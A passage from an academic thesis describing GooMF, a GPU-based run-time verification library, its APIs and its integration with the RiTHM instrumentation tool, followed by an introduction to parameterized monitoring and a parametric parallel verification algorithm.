configuration file using one of the two formalisms: Ltlor FSM. The properties are specified
through the predicates, which, in turn, consist of program variables listed in the same file.
GooMFGenerator — the generation module of GooMF — automatically generates the nec-
essary structures and headers for storing the snapshot of the program state. This program
state includes all the program variables comprising the predicates and thus involved in the
monitoring. Along with the header comprising the program state structure, GooMFGener-
ator produces three files that contain OpenCL code: GooMF GPUmonitor algpartial.cl ,
GooMF GPUmonitor algfinite.cl , and GooMF GPUmonitor alginfinite.cl . Each of these
files corresponds to a different parallel algorithm. The code in the files embodies the func-
tionality of the algorithms and the structure of the finite state machines of the properties.
As mentioned in Subsection 3.3.1, given Ltl 3properties, GooMFGenerator generates mon-
itors as deterministic finite state machines as defined in Definition 6 using the tool from
[6]. This architecture ensures that the configuration file is the only place that needs to be
changed after the properties evolve.
These steps are executed by the script GooMFMake, which should run offline before
running the actual program under inspection. The final result of this offline processing is
libGooMF.so — the shared library that contains all the verification functionality and can
be linked from the program.
4.2.1 Online Monitoring
The first method of GooMF usage is calling the Online API directly from the verified
program. The second method is calling the Offline API functions to parse / analyze the
41
libGooMF.so Recompile & Reinstallproperties.cfg GooMFCPUMonitor.h
ProgramState.h
GooMF_GPU_monitor_alg_partial.cl
GooMF_GPU_monitor_alg_finite.cl
GooMF_GPU_monitor_alg_infinite.clGooMFMakeGooMFGeneratorFigure 4.1: GooMF work–flow
input stream. The former approach gives the developer a full control over the monitoring
process, while the latter allows to implement the stream parser with minimal effort. In
its instance, GooMF is a shared library, and as such must be dynamically linked to the
program. Behind the scenes, GooMF Offline API uses the functions of Online API, which
is the reason why GooMFOnlineAPI.h header is included from GooMFOnlineAPI.h . During
the execution of the inspected program, the program states and events are buffered into
the verification buffer managed by GooMF . Given the type of the verification trigger,
this buffer is flushed either when it reached its maximal limit, or when specific function is
called.
Following is the list of the key functions in Online API:
•GOOMF initContext — initializes the monitoring context. This function accepts pa-
rameters that define the type of the verification algorithm, the type of the verification
trigger (buffer- or user-triggered), and the type of the call (blocking or non-blocking
— see Subsection 4.2.3).
•GOOMF destroyContext — destroys the monitoring context; usually called at the end
of the program execution.
•GOOMF nextState — loads the next program state to the verification buffer.
•GOOMF nextEvent — loads the next event to the verification buffer. This function is
useful when only one program variable has changed, and there is no need to copy the
entire program state.
42
•GOOMF flush — flushes the verification buffer; usually called if user-triggered verifi-
cation is selected.
For the full Online API see Appendix A.
4.2.2 Offline Monitoring
Run-time monitoring is useful when the decision needs to be taken while the program is
running and particularly appealing for fault prevention and recovery. Sometimes, however,
the requirement is to monitor the system offline. The prominent example is a postmortem
log analysis, when the goal is to examine the log by checking if it conforms to the specified
property. With this in mind, we designed GooMF so that it can be used for both purposes.
Callbacks. The Offline API is useful when the input stream of data has to be Ltl- or
FSM - parsed/analyzed with minimal effort and within minimal time. It is similar to the
way one would use libpcap / Winpcap packets capture modules. The developer is required
to provide four callback functions and then call a blocking function that will parse the
input stream until its done. The callbacks will be called upon the following events:
- Opening the input stream: typedef int (*open handler)() .
- Parsing the next program state: typedef int (*get next state handler)(void* next psptr)
Here, next psptris the pointer to the newly parsed program struct. The content of
the struct is copied to the verification buffer, so that the developer does not have to
allocate the memory dynamically.
- Property has been satisfied / violated: typedef int (*report handler type)(int
prop num, GOOMF enum verdict type verdict type, const void* program state)
Here, prop numis the number of the converged property, verdict type is the verdict
and program state is the final state in the sequence that caused the convergence.
- Closing the input stream: typedef int (*close handler)() .
Each callback function should return a negative number in case of failure or 0 in case of
success.
Analyze. To start the parsing, the developer should call GOOMF analyze function, with
the callback functions provided as arguments:
43
int GOOMF analyze(open handler oh callback,
.......get next state handler gnsh callback,
.......close handler ch callback,
.......report handler type rh callback,
....... GOOMF enum trigger type trigger type,
....... GOOMF enum algtype alg type,
....... GOOMF enum invocation type invocation type,
.......FILE* logger,
.......unsigned int buffer size);
where first four parameters are the callback function pointers; trigger type is type of the
trigger that causes the buffer of the program states to flush (user-invoked or buffer-size–
invoked); algtype is type of the verification algorithm: sequential, partial, finite history
orinfinite history ;invocation type controls if the verification is performed in the sepa-
rate thread (asynchronous) or the same thread with the blocking call (synchronous); logger
is the optional file descriptor for the additional output; buffer size is the size of the veri-
fication buffer. Once the maximum capacity is reached — the buffer needs to be flushed.
GOOMF analyze returns GOOMF SUCCESS if successful or predefined error. For the full Offline
API see Appendix B.
4.2.3 Synchronous vs. Asynchronous Invocation
The current version of GooMF optionally implements a multi-threaded monitoring archi-
tecture. The verification process might be either blocking (main thread invokes the flush
function and waits until its done) or non-blocking (main thread designates a worker thread
from the pool to perform the verification). In the non-blocking mode, the program under
scrutiny does not need to wait until the buffer is verified, rather the flush function is done
once the task is wrapped and sent to the verification device (GPU or CPU). The non-
blocking mode is more appealing, as the program can continue to run with the verification
happening at the background, which will obviously shorten the execution time of the pro-
gram. However, some considerations are to be thought of before using the asynchronous
mode. Namely, whether the program can afford additional delay in the report of property
violation/satisfaction. Also, the developer should provide a reliable report function that
GooMF will call in the case of convergence. Therefore, additional synchronization mecha-
nisms may be required for the safe implementation, because multiple threads are operating
simultaneously and possibly share same data.
The type of the invocation is controlled by the fourth parameter in GOOMF initContext()
function. The following code initializes GPU-based monitoring context that uses infinite-
history algorithm with a synchronous invocation and a size-triggered buffer flush:
44
GOOMF initContext(&context,
..... GOOMF enum buffer trigger,
..... GOOMF enum alginfinite,
..... GOOMF enum sync invocation,
.....1024);
This code initializes CPU-based monitoring context that uses the sequential verification
algorithm with an asynchronous invocation and a user-triggered buffer flush:
GOOMF initContext(&context,
..... GOOMF enum notrigger,
..... GOOMF enum algsequential,
..... GOOMF enum async invocation,
.....4096);
4.2.4 Other Features
The predicates for the properties are automatically embodied into the verification function
code, thus stated in C language. This allows several interesting features, namely using
C functions to evaluate the predicate. The property file can contain separate section
for user functions, thus enabling evaluation of complex and evolved predicates as well as
using the power of C language for this evaluation. Consider, for example, property from
Subsection 3.3.3. φ3verifies whether the conversion of the coordinates from coordinates
from World Geodetic System (WGS) to Earth-Centered, Earth-Fixed (ECEF) to East,
North, Up (ENU) Cartesian coordinate system performed right. Without the ability to
encompass the logic of the predicate into the function, it would be virtually impossible to
express this predicate. Instead, it would take a set of other, smaller predicates to form
the original one. To verify e, and, consequently, φ,GooMF calls the function specified in
the beginning of the property file in the “functions” section. Obviously, it should return
boolean variable at the end. Same section allows the user to specify constant and other
global variables used for the predicate evaluation.
The properties can be specified using one of the two formalisms: Ltl orFSM . For
FSM ,GooMF requires AT&T FSM format1. Behind the scenes, GooMF calls the
script from [6] to generate the monitor FSM in the same format. This action takes place
in function buildFSMs() in GooMFGenerator module. To introduce additional formalism,
a future developer should add functionality only to this function. For example, an Ex-
tended Regular Expression (ERE) formalism can be added by calling the new script from
1http://www2.research.att.com/ ~fsmtools/fsm/tech.html
45
buildFSMs() . This script should generate FSM from ERE and convert this FSM into
AT&T FSM format.
There are several formats for expressing a Finite State Machine. The most logical way
to express FSM is a sequence of ifoperators. Every ifclause checks the conditions for
a transition given a current FSM state and an input event. Although this is not the
most efficient way in terms of decision–making time and code size, it is definitely the most
intuitive. Another, more efficient approach is to store the FSM as a matrix. All possible
input combinations are encoded in first dimension, and all possible states are encoded
in second dimension. This way, the decision about next state is reduced to an action
of assignment. The disadvantage of this method is in its succinctness: if a transition is
accompanied with an action, it is impossible to incorporate the latter into the code. Hence,
the decision about FSM representation is left to the GooMF user. It can be specified on
a per-property basis in the configuration file.
GooMF allows enabling and disabling monitoring on a per-property basis. More im-
portantly, this can be done at run time. If for some reason a property known to be not
active, it can be disabled using GOOMF disableProperty() API call. This feature saves
evaluation time of unnecessary predicates.
4.2.5 Implementation Issues
While working on GooMF , we encountered several implementation problems. Most of the
issues were GPU-related, since the performance of GPU-based execution is highly sensitive
to changes in the OpenCL kernel code.
As mentioned in Section 2.3, heterogeneous memory hierarchy promotes local synchro-
nization. This became especially obvious when we tried to use function atomic min() on
the variable residing in the global memory. Function atomic min() is used for evaluat-
ing the left-most state transition in Algorithm 1. The first version of the kernel included
atomic min() applied to the global state transition index, which resulted in approximately
30% of the slowdown of the complete algorithm run. To solve this problem, we reduced
the problem domain to the local memory. After every work-group of 256 threads evaluated
its left-most state transition, one thread passes over the results and picks the first-in-order
transition.
Another compelling problem is related to the work scheduling between the worker
threads. Sometimes, when the worker is blocked or is waiting for the IO operation to
complete, it can automatically switch to the next work–item to continue its work. We
leverage this feature by assigning several work–items to the same thread — depending on
46
the number of items in the work buffer. Obviously, this will only work if the number of
program states in the verification buffer is less than the number of worker threads available
in the compute device.
At the end of Section 2.3, we pointed out the trend in the industry to couple the
CPU and the GPU on the same die, which results in faster memory transfer between
the two. The specific location of the memory allocation is controlled by the memory flags
when calling the allocation function clCreateBuffer() . The flags are: CLMEMUSEHOST PTR,
CLMEMALLOC HOST PTR, and CLMEMCOPY HOST PTR.CLMEMUSEHOST PTRindicates that the
program commands the OpenCL to use the memory referenced by the host pointer as the
storage space for the memory object. OpenCL implementation is allowed to cache the
buffer contents pointed to by host pointer in device memory. This cached copy can be used
when kernels are executed on a device. CLMEMALLOC HOST PTRspecifies that the applica-
tion commands the OpenCL to allocate the memory from the host-accessible memory.
CLMEMCOPY HOST PTRindicates that the program commands the OpenCL to allocate the
memory for the memory object and copy the data from memory referenced by the host
pointer. We discovered that, giving the OpenCL ability to allocate memory by specifying
CLMEMALLOC HOST PTRflag, results in performance gain on the run of both Algorithm 1
and Algorithm 2.
4.3 GooMF and RiTHM
Run-time Time-triggered Heterogeneous Monitoring (RiTHM) takes a C program and a
set of Ltl properties as input and generates an instrumented C program that is verified
at run time by a time-triggered monitor. It supports two monitoring modes: the program
either self-monitors itself (i.e., the monitoring code is weaved with the input program),
or it incorporates an external monitor thread. In both cases, the monitor is invoked in
a time-triggered fashion, ensuring that the states of the program can be reconstructed at
each invocation by using efficient instrumentation. The verification decision procedure is
sound and complete and takes advantage of the GPU many-core technology to speedup
monitoring and reduce the run-time monitoring overhead.
4.3.1 RiTHM Overview
Figure 4.2 shows the different modules and detailed data flow of RiTHM. The tool takes
a C program and a set of Ltl properties as input and generates an instrumented C pro-
gram as output. We, in particular, use the 3-valued linear temporal logic ( Ltl 3) designed
47
particularly for RV [6]. Each Ltl 3property is specified in terms of variables of the given
C program. For instance, G(x >= 10 and foo.y = z) is one such property, where xand
zare two global variables and yis a local variable of function foo.
48
Instrumented
C Program
with Monitor
IdentifierCritical
Instruction Critical
CFG
Builder
GeneratorGlue Code
Generator
Monitor InstructionInstrumented
CCFG
Builder
12
35 6 79 1110
Tree GenertorAbstract Syntax
LTL3 MonitorGPU/CPU−basedILP
Solver
Greedy heuristic
VC heuristic
PeriodSamplingLTL PropertiesC ProgramCFGInstruction
LinesProgramC
for LTL3 MonitorsOpenCL Kernel Code for GPU/Multi−coreExternal monitoring path
Self−monitoring pathLegend
Instrumentor
SetInstruction
CFGCriticalLinesProgram
Thread CodeAST
Globalizer
VariablesGreedy heuristicSMT
Solver
GeneratorTimer ObserverHigh Resolution8
LLVMlp_solveYices
LLVM4LLVM Clang
Figure 4.2: Building blocks and data flow in RiTHM.
49
 1. fib(int n) {! 2.!   int  i, Fnew, Fold, temp,ans;! 3.!   Fnew = 1;  Fold = 0;! 4.!   i = 2;! 5.!   while( i <= n ) {! 6.!! !!temp = Fnew;! 7.*! !!!Fnew = Fnew + Fold;! 8.*! !!!Fold = temp;! 9.!   !!i++; }! 10.*! ans = Fnew;! 11.!! return ans;}!(a)Fibonacci function in C
D 5 C 6..9 B 10-11 1 1 4 A 2..4 4 (b) CFG
C1 6 1 1 A 2..4 4 D 5 C2 7 1 C3 8 C4 9 1 1 B1 10 B2 11 1 
Critical Vertex Non-critical Vertex 1 (c) Critical CFG
Figure 4.3: Example of a program and CFG.
Module 1 (in Figure 4.2) is Globalizer , which takes the C program and Ltlspecification
as input and generates a C program, where all the variables that participate in the Ltl
properties are changed into global variables in the C program. Globalizer also generates
the list of the globalized variables and passes it to the Ltl 3Monitor Generator (module
3) and CFG Builder (module 2) that generates the C program’s control–flow graph . This
module is implemented over LLVM [30]. For example, the CFG of the program in Figure 4.3a
(Fibonacci function) is shown in Figure 4.3b, where the weight of each arc is the best-case
execution time of the instructions in the originating vertex. For simplicity, we assume that
each instruction takes one time unit.
Using the generated CFG, Critical CFG Builder identifies the vertices (called critical
vertices ) that may change the valuation of the Ltl properties (module 6). The resulting
CFG is called critical CFG (see Figure 4.3c).
Given a CFG, RiTHM can generate two types of instrumented programs with respect
to the techniques described in detail in [10, 11, 33]. Based on those instrumentation
techniques, the program undergoes the following transformations:
•A program, where monitoring instructions are weaved into the program (module 4);
i.e., the program self-monitors itself (the green path in Figure 4.2).
•A program augmented with a TTM thread (modules 5-8); i.e., an external thread
that monitors the program (the blue path in Figure 4.2).
50
 1. fib(int n) {! 2.!   int  i, Fnew, Fold, temp,ans;! 3.!   Fnew = 1;  Fold = 0;! 4.!   i = 2;! 5.!   while( i <= n ) {! 6.!! !temp = Fnew;! 7.*! !Fnew = Fnew + Fold;! 8.        current_program_state.Fnew = Fnew;! 9.        next_state(context, !!!!!!!(void*)(&current_program_state));! 10.*! !Fold = temp;! 11.!   !i++; }! 12.*  ans = Fnew;! 13.   current_program_state.ans = ans;! 14.   next_state(context, !!!!!!!(void*)(&current_program_state));! 15.   flush(context);! 16.   return ans;}!(a) Instrumented Fibonacci function for
external monitoring.
 1. fib(int n) { 
 2.   int  i, Fnew, Fold, temp,ans ; 
 3.   current_program_state.Fnew  = Fnew; 
 4.  current_program_state.ans  = ans; 
 5.  next_state (context ,(void*)(& current_program_state )); 
 6.   Fnew = 1;  Fold = 0;  
 7.   i = 2; 
 8.   while( i <= n ) { 
 9.     current_program_state.Fnew  = Fnew; 
10.   current_program_state.ans  = ans; 
11.     next_state (context,              
   (void*)(& current_program_state )); 
12.   temp = Fnew; 
13.      Fnew = Fnew + Fold; 
14.    Fold = temp; 
15.   i++; } 
16.   ans = Fnew; 
17.   current_program_state.Fnew  = Fnew; 
18.   current_program_state.ans  = ans; 
19.   next_state (context,(void *)(&current_program_state )); 
20.   flush(context ); 
21.   return ans;} (b) Instrumented Fibonacci function for self-monitoring.
Figure 4.4: Instrumented programs.
The output of either technique is a set of instructions in the input C program that needs to
be instrumented to enable sound external/self-monitoring. The lines of code corresponding
to the instructions are located using the abstract syntax tree generator (module 10) of
LLVM Clang , and instrumented by Instrumentor (module 9). Finally, Glue Code Generator
(module 11) augments the instrumented code with the synthesized Ltl 3monitors and
proper function calls for verifying properties at run time.
4.3.2 GooMF as a Back End for RiTHM
GooMF serves as a back-end infrastructure for the RiTHM. Since GooMF is a shared
library, the integration of the front- and middle- end modules with the verification engine
is straightforward: after the instrumentation stage is over, GooMF API calls are inserted
at the end of the instrumented vertices in the Critical CFG.
Figure 4.4 demonstrates the results of such instrumentation on the example of previ-
ously shown Fibonacci function. The result of the external TTM instrumentation path is
displayed in Figure 4.4a, whereas Figure 4.4b illustrates the outcome of the self-monitoring
path. As can be seen, the number and the instance of instrumented vertices differ for two
different methods.
51
Depending on the instrumentation, GOOMF nextState() orGOOMF nextEvent() may be
called. The latter is particularly useful for the event-based monitoring, when every change
in the variable is monitored. In this case, call to GOOMF nextEvent() saves the time of
copying the whole program state into the verification buffer. Instead, only one (modified)
variable is copied, and GooMF takes the rest from previous program state.
For the sake of broader usability of the tool, we allow the user to choose the verification
platform by choosing appropriate verification algorithm when specifying the instrumenta-
tion parameters. Therefore, RiTHM can work on machines with or without GPU.
52
Chapter 5
Towards Parameterized Monitoring
This chapter describes the first steps towards integration of parameterized monitoring and
the proposed parallel algorithms. Section 5.1 offers a high-level overview of parameter-
ized monitoring and presents basic definitions. Section 5.2 surveys the state-of-the-art in
parameterized monitoring and the problems raised by it. Finally, Section 5.3 discusses
the steps towards practical incorporation of parameterized monitoring into the finite- and
infinite-history algorithms. Section 5.4 evaluates the algorithms’ performance in light of
the aforementioned changes.
5.1 Introduction to Parameterized Monitoring
Parameterized run-time monitoring is an extension of a more traditional run-time monitor-
ing, where verified properties may have one or more unbound universal quantifiers, which,
when instantiated, produce a new monitoring instance . In addition, the verified properties
may depend on variables other than those in program state. These special variables are
recorded at specific points of time and virtually add state to the monitoring instance.
To illustrate the concept, consider commonly used property “if file is open, it must be
eventually closed”: □(open→♦close ). With conventional future-time Ltlformalism, this
property requires separate definition for every possible file:
53
□((action ==open∧file==f1)→♦(action ==close∧file==f1));
□((action ==open∧file==f2)→♦(action ==close∧file==f2));
...
□((action ==open∧file==fn)→♦(action ==close∧file==fn));
This cumbersome definition imposes several problems. First, and the most obvious,
need of maintaining multiple properties definitions: when the property or predicate evolve,
the developer is required to update all the definition instances. Second, the developer
has to know in front about all possible files open / closed in the system. Third, every
property definition by default represents separate monitoring instance. Therefore, there is
an unnecessary overhead of running the monitoring instances for yet-to-be-created files.
On the contrary, one can use the parameterized syntax for the same property: regular
Ltlsyntax augmented with first order quantification:
∀f∈F:□((action ==open∧file==f)→
♦(action ==close∧file==f))
whereFis the set of all possible file descriptors and fis a parameter . Properties that
use parameters are called parametric properties . Note that set Fcan be unknown before
the actual program run. During the program execution, new monitor instance is spawned
every time the open event is met with new parameter f, thus saving the overhead caused
by not-yet-created monitor instances. Even shorter version of the property □(open⟨f⟩→
♦close⟨f⟩) assumes implicit universal parameter f. We use pointy brackets to distinguish
between regular parentheses and parameterized events.
Defining Variables. More formally, parameter fcan be seen as a special program state
variable that defines the monitoring instance of the property. Given the parameterized
propertyφ, we call the set of such variables defining variables of the property and denote it
asDV(φ). The notion of defining variables was also introduced in [7] and used excessively
in run-time verification framework J-Lo. Naturally, DV(φ)∈V, whereVis a set of
variables used in the program at any given time. Normally, a program state represents a
mapping of a subset of Vto values. The event of associating specific value with parameter
and, consequently, with monitoring instance, is called bind orbinding event . The opposite
event of dissociating a parameter value is called unbind orunbinding event . Note that
DV(φ) can contain several variables, thus delaying the actual instantiation of the monitor
up to the point when all the variables are bounded. Only from that moment, the monitoring
54
will be intelligible. Therefore, the verification tool that would implement parameterized
monitoring should handle the management of those partially instantiated monitors. Later
in Section 5.2 we will see how verification frameworks J-Lo and JavaMOP deal with this
issue. Classical example of multiple defining variables is the safety property that describes
the map iteration in Java from [26]:
∀m,c,i :□(getset⟨m,c⟩∧♦(getiter⟨c,i⟩
∧♦((modifyMap⟨m⟩∨modifyCol⟨c⟩)∧♦useiter⟨i⟩)))
Eventgetset represents the moment when the collection cis retrieved from the map m. This
event effectively binds two of the parameters for this property. The monitoring instance
of the property is only instantiated when getiter is met, which finally binds the actual
iteratori. From that point and on, events modifyMap ,modifyCol , anduseiter relate to
the specific monitoring instance.
Used Variables. As opposite to parametric properties that require instantiation and
result in multiple instances, there is a class of parametric properties that will only have
one instance. Consider, for example, third property from Subsection 3.3.3:
φ1=□(d→(⃝¬d)∨(⃝⃝¬d)∨(⃝⃝⃝¬d))
Predicatedstands for “number of satellites less than three”. φ1verifies that this undesir-
able state will not last more than four consecutive program states. One can notice that
the property syntax is not “scalable”: if the undesirable state of insufficient number of
satellites is extended to ten consecutive program states, the length of the property will
explode linearly. To eliminate this dependency, parameter is required:
φ1=□(d⟨p⟩→((ts<p +x)U¬d)))
Here,pis a parameter, tsis a variable in a program state representing the timestamp,
andxis a constant representing maximal allowed duration of the unhealthy system state.
Although this property is parameterized, it only has one instance active from the very
beginning of the program run, since there can be only one unhealthy system state. As
a result, the property will always have only one instance ( DV(φ) =∅), but will use ts
variable as the parameter. We call such variables used variables of the property and denote
the set of these variables as UV(φ). Note that UV(φ) does not have to be a subset of
V, but a function on variables from V. For example, the property above may need to
55
storetsin a different format than that in the program. In this case, UV(φ) ={p=
toNanoseconds (ts)}, wheretoNanoseconds () is a conversion function. Similar to defining
variables, the notion of used variables was introduced in [7].
In the previous example, the parameter phas to be bound upon receiving the first
program state with d=true. This brings us to the point where Ltl syntax is no longer
enough to express the semantics of parameterized property, because the binding event
depends not only on the program state, but also on the current state of the monitor.
More precisely, binding the pto the value of tsis only necessary when first unhealthy
state is encountered. FSM, on the other hand, is the perfect formalism for expressing the
parametric specifications as it allows to capture the event of binding during specific state
transition.
Figure 5.1a shows FSM structure for property φ1. Figures 5.1b and 5.1c show the
FSMs for properties φ2andφ3respectively. Binding actions are displayed on top of the
transition edges with symbol “ →” denoting the action of association of a parameter with
a value. The defining and used variables sets are shown below. The properties displayed
in the figure represent different types of the parametric properties:
•φ1, as mentioned previously, maintains only one instance and binds the parameter
ponce per unhealthy state. Once pis bound, the monitor either unbound when the
healthy state is over, or eventually ends up in the violation state. As the property
has only one monitoring instance, the unbinding action does not result in a monitor
destruction. DV(φ1) =∅,UV(φ1) ={ts}.
•φ2=□(open⟨file⟩→♦close⟨file⟩) is the file open–close property already discussed
at the beginning of this section. The binding action occurs once the file is open, and
the unbinding action occurs once one of the open files is closed. The binding action
triggers the creation of the new monitoring instance; the unbinding action triggers
the destruction of the instance. DV(φ2) ={file},UV(φ2) =∅.
•φ3=□(a⟨item,bidamount⟩→(b U c )) describes a bidding process: once a bid on
specific item is posted, the bid amount can only go higher. Predicate astands for first
bid on the item. It effectively binds variables item andbidamount to parameters p1
andp2. Predicate bstands forbidamount>p 2∨item̸=p1: the legal (higher) bid
on the bidden item or other activity on the unbidden items. Predicate cstands for
the bid closure. This property has an instance for every bidden item. As expected,
binding of item top1triggers the creation of the new monitoring instance, while
unbindingp1triggers the destruction. Binding bidamount top2, however, does not
trigger creation. DV(φ3) ={item},UV(φ3) ={bidamount}.
56
q0 q1¬d d
q⊥d∧(ts≥p+x) /unbind (p)¬d∧(ts < p +x)d/bind (ts→p)(a)
q0 q⊥¬open ¬close
close/unbind (p)open/bind (file→p) (b)
q0 q1
q⊥¬b∧ ¬cc/unbind (p1, p2)b∧ ¬c/
bind (bidamount →p2)¬a
bidamount →p2)a/bind (item→p1,
(c)
Figure 5.1: Monitors for a sample of parametric properties.
These examples demonstrate the value of the parameters: both used and defining vari-
ables empower monitor to save additional history inside the monitor, but there is a basic
difference between them. Defining variables are only used to relate the events in the
program to the correct monitoring instance, whereas used variables simply add another
dimension to the state of the monitor.
After introducing the notions of used and defined variables and augmenting monitoring
FSMs with bind–unbind actions, we revise the definition of the monitor:
Definition 11 (Monitor for Parametric Property) Letφbe a parametric Ltl 3for-
mula over alphabet Σ∪P, wherePis a set of parameters. The monitorMφofφis the
unique FSM (P,Σ∪P,Q,q 0,δ,Φ,ρ,λ), whereQis a set of states, q0is the initial state, δis
57
a transition relation, and λis a function that maps each state in Qto a value in{⊤,⊥,?},
such that:
[u|=φ] =λ(δ(q0,u)).
In addition, Φis a set of bind–unbind actions on Pplus empty action and ρis a
function that maps each transition to a bind–unbind action: ρ:{Q×Q}→ Φ.■
This definition abstracts away the notion of defined and used variables. Also, it does
not limit Φ to be an assignment to a parameter. Rather, action in Φ can be seen as a
function in C (i.e. toNanoseconds () forφ1).
5.2 State of the Art in Parameterized Monitoring
The mechanism for parameterized monitoring was first implemented in verification tool
Eagle and in Hawk [16], built on top of Eagle. Although lacking the semantic division
between used and defining variables, Eagle and Hawk support instantiation of multiple
monitoring instances per property. The verification ability of these tools, however, is con-
strained by incomplete property specification semantics (only □and♦temporal operators
are allowed) and by the restrictions on monitoring points (the events are only reported
upon function execution and return).
Like Eagle and Hawk, J-Lo binds variables to free parameters, but is not restricted
to specific monitoring points. This is due to the use of AspectJ as an instrumentation
engine. The authors specifically distinguish between the defining and used variables and
introduce new formalism Dynamic LTL to define parametric properties over the program
space. One of the interesting features of J-Lo is the ability to automatically differentiate
between defining and used variables and treat them differently.
Most of the tools that support parameterized monitoring, tightly couple the handling
of parameter bindings with the property checking, yielding monolithic but supposedly ef-
ficient monitors. Such combinations of parameter binding and property checking result in
extremely complex and formalism-specific algorithms, hard or impossible to adapt to other
formalisms. More recent attempt of implementing parameterized monitoring is JavaMOP
— a variation of JavaPaX tool, but specifically dedicated to run-time monitoring. Java-
MOP was built with the intention to decouple specification formalism and implementation
of parameterized binding, which resulted in a variety of possible formalisms the framework
can work with (see Section 4.1). Specifically, JavaMOP uses the technique called “trace
slicing”: the execution trace is sliced for each parameter instance, so that a monitor for each
58
parameter instance receives only relevant program events. As a result, every monitoring
instance is independent of parameters, resulting in a formalism-independent architecture.
The major problem with this approach is the fact that the system needs to dispatch each
event to the corresponding monitor given the parameter instance of the event.
Another big challenge in fully implemented parameterized monitoring is the difficulty
of managing partly and fully instantiated monitoring instances. Consider the following
property from Section 5.1:
∀m,c,i :□(getset⟨m,c⟩∧♦(getiter⟨c,i⟩
∧♦((modifyMap⟨m⟩∨modifyCol⟨c⟩)∧♦useiter⟨i⟩)))
The monitoring of this property should begin from the point where all the defining pa-
rameters are bound. Naturally, this will not happen at once. First, the framework will
bind map variable, then, given the bound parameter, the collection variable. Then, given
both bound parameters, iterator variable will be bound. In the meanwhile, the monitoring
framework should keep these partially initialized structures in the memory, where they can
be fetched from and connected to the upcoming events.
The aforementioned two challenges were the reason why the first version of JavaMOP
could not handle properties with more than one defining variable [14]. Jin in his doctoral
thesis [26] presents the next version of JavaMOP and describes the proposed solution in
detail. The new data structure for the indexing tree is proposed, which contains all of the
mappings from parameter objects to monitors. The indexing tree is an efficient means to
locate the monitors for a given parameter instance. The authors implement it as a multi-
level map that, at each level, indexes each parameter object of the parameter instance. As
expected, the performance check revealed that this data structure is the key bottleneck in
terms of both run time and memory performance. This is because the size of the indexing
tree grows as the specification creates more monitors. The authors tackle this issue to
some extent by combining the indexing trees if their defined parameter types share the
same prefix.
Some other impressive JavaMOP features are: (1) supporting specification inheritance
for reusing specifications (similarly to object inheritance); (2) special optimization that
avoids monitoring partially instantiated parametric instances; (3) garbage collection of the
monitor instances that reached a final state. All these qualities make JavaMOP positively
one of the most successful and mature monitoring frameworks. However, similarly to
J-Lo, JavaMOP relies on some of the features of Java (objects structure, objects meta
data, garbage collection, hash functions incorporated in every object, existence of weak
references etc). This dependency makes it difficult to port the tools to other, possibly
59
non-object-oriented, languages. For example, JavaMOP keeps the initialized monitoring
instances in a special hash–tree data structure, which is accessible by hash–code of the
monitored objects. Obviously, this solution is not suitable for implementation in C and
C++.
5.3 Parallel Verification amid Parameterized Moni-
toring
In the previous section, we discussed the difficulties associated with proper employment of
parameterized monitoring on the example of JavaMOP. In our case, complete and sound
implementation of parameterized monitoring is also constrained by application of parallel
algorithms. This work is a first step towards incorporation of parameterized monitoring
into the finite- and infinite-history algorithms.
5.3.1 Algorithms and Parameterized Monitoring
Intuitively, parameters introduce an additional level of uncertainty for parallel algorithms.
The decision about monitor state transition now depends not only on current monitor state
and a program state, but also on the values of bound parameters. When processing several
program states in parallel, the ( i+ 1)-th transition does not now the real values of the
bound parameters, as those may alter during the processing of i-th transition. Following
paragraphs give a detailed description of how parameterized monitoring influences the set
of proposed algorithms.
Parameterized monitoring with sequential and partial–offload algorithms .
Both sequential and partial–offload algorithms can handle parameterized monitoring with-
out serious changes. Let φbe a parametric property in Ltlmon
3andMφ= (P,Σ∪
P,Q,q 0,δ,Φ,ρ,λ) be its monitor; for every program state both algorithms perform the
following steps:
1. New program state siis received.
2. Based on si, perform calculations to map predicates (the Ltlformula consists of) to
eithertrue orfalse (possible on GPU for partial–offload algorithm).
60
3. Based on the values of the predicates, make the appropriate transition from qi−1to
qi. If transition carries an action ( ρ(qi−1,qi)̸=∅), perform it.
This flow is similar to the one in conventional sequential and partial–offload algorithms
from Chapter 3 except for the last step, where bind–unbind actions are taking place.
Algorithm 3 For parametric finite-history Ltlmon
3properties
Input: A monitorMφ= (P,Σ∪P,Q,q 0,δ,Φ,ρ,λ), a stateqcurrent∈Q, and a finite program trace
σ=s0s1s2...sn.
Output: A stateqresult∈Qandλ(qresult).
/*Initialization */
1:StartIndex←0
2:I←⟨n+ 1,qcurrent⟩
3:P←∅
4: Let mbe a mutex
/*Parallel computation of next monitor state given the current state and state of the parameters */
5:for all (si,StartIndex≤i≤n) in parallel do
6:qresult←δ(qcurrent,si)
7: lock( m)
8:if((qcurrent̸=qresult∨ρ(qcurrent,qresult)̸=∅)∧i<key (I))then
9:I←⟨i,qresult⟩
10: Perform action Φ ( ρ(qcurrent,qresult)) and updateP
11: end if
12: unlock( m)
13:end for
/*Obtaining the result */
14:ifkey(I) =n+ 1then
15: returnqresult,?
16:else
17:qresult←value (I)
18: ifλ(qresult)̸= ?then
19: returnqresult,λ(qresult)
20: end if
21:qcurrent←qresult
22: StartIndex←StartIndex +key(I) + 1
23: goto line 2
24:end if
Parameterized monitoring with finite-history parallel algorithm . Amid pa-
rameterized monitoring, the decision about monitor state transition depends not only on
61
current monitor state and a program state, but also on the values of bound parameters.
Upon every bind–unbind action, the algorithm should update the state of the parameters,
and thus, will need additional iterations for every such action. The changes are shown in
parametric version of finite-history algorithm in Algorithm 3. The algorithm takes a finite
program trace σ=s0s1...s n, a monitorMφ= (P,Σ∪P,Q,q 0,δ,Φ,ρ,λ), and a current
stateqcurrent∈Q(possiblyq0) of the monitor as input and returns a resulting state qresult
and the monitoring verdict λ(qresult) as output.
We only describe changes to the original algorithm. Line 3 initializes a structure that
holds the state of the parameters to the default value. In lines 8–10, tuple Iis set to
⟨i,qresult⟩and the state of the parameters is updated. It happens not only if program
statesiresults in enabling a transition from current monitor state qcurrent , but also if the
transition is accompanied with the action from Φ. Note that the transition can be a self–
loop. This way, at the end of this phase tuple Iwill contain either the left-most transition,
or the left-most bind–unbind action and Pwill be updated with right values. The rest of
the algorithm remains unchanged.
Parameterized monitoring with infinite-history parallel algorithm . Infinite-
history algorithm relies on exhaustive computations to eliminate interdependencies among
the data items. Not knowing current monitor state, the algorithm calculates next state
for every possible current state given a program state as an input. With the addition of
parameterized monitoring, there is an additional input to the algorithm — the state of the
parameters. Although it possible to pre-calculate predicate value for every inconclusive
